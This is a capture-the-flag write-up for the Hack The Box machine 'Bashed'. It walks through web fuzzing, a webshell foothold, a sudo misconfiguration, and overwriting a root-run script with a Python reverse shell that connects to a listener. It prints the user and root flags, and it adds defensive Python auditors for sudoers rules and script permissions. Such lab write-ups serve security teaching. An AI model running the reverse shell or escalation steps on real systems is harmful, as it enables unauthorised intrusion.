# Bashed

Platform: Hack The Box
IP Address: 10.10.10.68
Difficulty: Easy (Linux)
Bashed is a fairly easy machine focused on web fuzzing and identifying exposed files and services. The box is a great example of privilege escalation via exposed scripts and improper sudo permissions. Enumeration is key, as the initial foothold is obtained through an exposed phpbash webshell.
## Enumeration

Full port scan, then a service/script scan of the open port:

```shell
nmap -p- 10.10.10.68 --min-rate 10000
nmap -p 80 10.10.10.68 -sCV -oN nmapscan
```
## Web Fuzzing

http://bashed.htb → exposed phpbash script in development.

```shell
dirsearch -u http://bashed.htb
```

/dev/ → phpbash.php shell

Also verified with gobuster:

```shell
gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
```
## Foothold

/dev/phpbash.php → initial webshell as www-data.

Browsed to /dev/phpbash.php and spawned an interactive shell:

```shell
whoami
# www-data
```

/home → found users:

- /home/arrexel
- /home/scriptmanager

```shell
cat /home/arrexel/user.txt
# af827e749b08685a006408eaf072b8f3
```
## Privilege Escalation: www-data → scriptmanager

Output of `sudo -l`:

```
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```

```shell
sudo -u scriptmanager /bin/bash
```
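The rule above is the textbook misconfiguration an auditor looks for: a service account allowed to run any command as another user with no password. As an added, defender-side example that is not part of the original writeup, the Python below parses sudoers-style user specifications and grades them by how much they hand over. The sample rules are constructed; only the www-data line mirrors the shape of the rule observed on the box.

```python
import re
from dataclasses import dataclass

# Constructed sample of /etc/sudoers-style rules. Not the box's real file; the
# www-data line mirrors the shape of the rule the writeup observed.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
deploy          ALL=(root) /usr/bin/systemctl restart app
"""

# user  host = (runas_user[:runas_group]) [TAG: ...] command_list
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>\S.*)$"
)


@dataclass
class SudoFinding:
    user: str
    runas_user: str
    commands: str
    severity: str
    reason: str


def parse_rule(line: str):
    """Parse one user-specification line.

    Returns (user, runas_user, tags, commands) or None for comments, Defaults
    lines and anything the simple grammar above does not cover.
    """
    line = line.strip()
    if not line or line.startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = m.group("runas")
    # No (runas) part means the command runs as root.
    runas_user = (runas.split(":")[0].strip() if runas else "") or "root"
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    return m.group("user"), runas_user, tags, m.group("cmds").strip()


def audit_sudoers(text: str) -> list[SudoFinding]:
    """Grade each rule: ALL + NOPASSWD is high, ALL with a password is medium,
    a fixed command without a password is low (the binary still needs review),
    and a fixed command with a password is not reported."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        user, runas_user, tags, cmds = rule
        if user == "root":
            continue  # root gains nothing from a sudo rule
        nopasswd = "NOPASSWD" in tags
        if cmds == "ALL" and nopasswd:
            sev, why = "high", f"any command as {runas_user} with no password"
        elif cmds == "ALL":
            sev, why = "medium", f"any command as {runas_user} (password required)"
        elif nopasswd:
            sev, why = "low", "fixed command without a password; confirm it cannot spawn a shell"
        else:
            continue
        findings.append(SudoFinding(user, runas_user, cmds, sev, why))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user} -> {f.runas_user}: {f.commands} ({f.reason})")
```

Run it against `sudo -l -U <user>` output or the files under `/etc/sudoers.d/` after normalising them to one rule per line; the regex is deliberately narrow and returns None for aliases and multi-command lists, so anything it skips should be read by hand rather than assumed safe.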
## Privilege Escalation: scriptmanager → root

/scripts/test.py → observed that it runs as root.

Replaced test.py with a reverse shell:

```python
import socket, subprocess, os

# Connect back to the listener (address and port as used in the writeup)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.26", 80))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell whose I/O is now the socket
p = subprocess.call(["/bin/sh", "-i"])
```
Started listener:

```shell
nc -nlvp 80
```

Gained root shell:

```shell
whoami
# root
cat /root/root.txt
# 249277f71cf2bb8e0ec15a570c8fdfdf
```
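The weakness used in this step is a root-level job executing a script that a lower-privileged account can modify. As an added example that is not part of the original writeup, the Python below audits a script and the directory holding it for any write path available to a non-root user; the directory matters because a writable directory lets the file be swapped even when the file itself is read-only. The scripts directory it inspects is a constructed temporary one, not the box's /scripts.

```python
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class ScriptFinding:
    path: str
    reason: str


def weak_perms(mode: int, uid: int, label: str) -> list[str]:
    """Reasons an object with this st_mode and st_uid can be altered by a non-root user.

    `label` names the object in the message ("script", "parent directory").
    """
    reasons = []
    if uid != 0:
        reasons.append(f"{label} owned by uid {uid}, not root")
    if mode & stat.S_IWGRP:
        reasons.append(f"{label} is group-writable")
    if mode & stat.S_IWOTH:
        # A sticky, world-writable directory (/tmp style) still lets anyone add
        # files, so it is reported too; only replacing others' files is blocked.
        reasons.append(f"{label} is world-writable")
    return reasons


def audit_root_script(path: str) -> list[ScriptFinding]:
    """Flag a script run by a root-level job if it, or its parent directory,
    can be modified by someone other than root."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append(ScriptFinding(path, "script is a symlink; check who controls the target"))
        st = os.stat(path)  # follow the link for the permission checks below
    for reason in weak_perms(st.st_mode, st.st_uid, "script"):
        findings.append(ScriptFinding(path, reason))
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    for reason in weak_perms(pst.st_mode, pst.st_uid, "parent directory"):
        findings.append(ScriptFinding(parent, reason))
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed scripts directory (not the box's /scripts) and audit
    both files in it; returns only the script-level reasons for each path."""
    base = tempfile.mkdtemp(prefix="scripts_audit_")
    loose = os.path.join(base, "test.py")    # constructed: anyone can overwrite it
    tight = os.path.join(base, "backup.py")  # constructed: owner-only write
    for p in (loose, tight):
        with open(p, "w") as fh:
            fh.write("print('scheduled job')\n")
    os.chmod(loose, 0o666)
    os.chmod(tight, 0o644)
    return {p: [f.reason for f in audit_root_script(p) if f.path == p]
            for p in (loose, tight)}


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", reasons or ["no non-root write path found"])
```

On a real host, feed `audit_root_script` every script referenced from root's crontab, `/etc/cron.*`, and systemd units running as root; a clean result is a root-owned file (mode 0644 or tighter) inside a root-owned directory that is not group- or world-writable.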
Writeup by inksec
GitHub: https://github.com/inkedqt

- 🧪 [HTB: Bashed](https://github.com/inkedqt/ctf-writeups/tree/main/HTB/Retired/bashed)

Attack chain: Web fuzzing → PHPbash webshell → User enumeration → Sudo to scriptmanager → Privileged script abuse → Reverse shell as root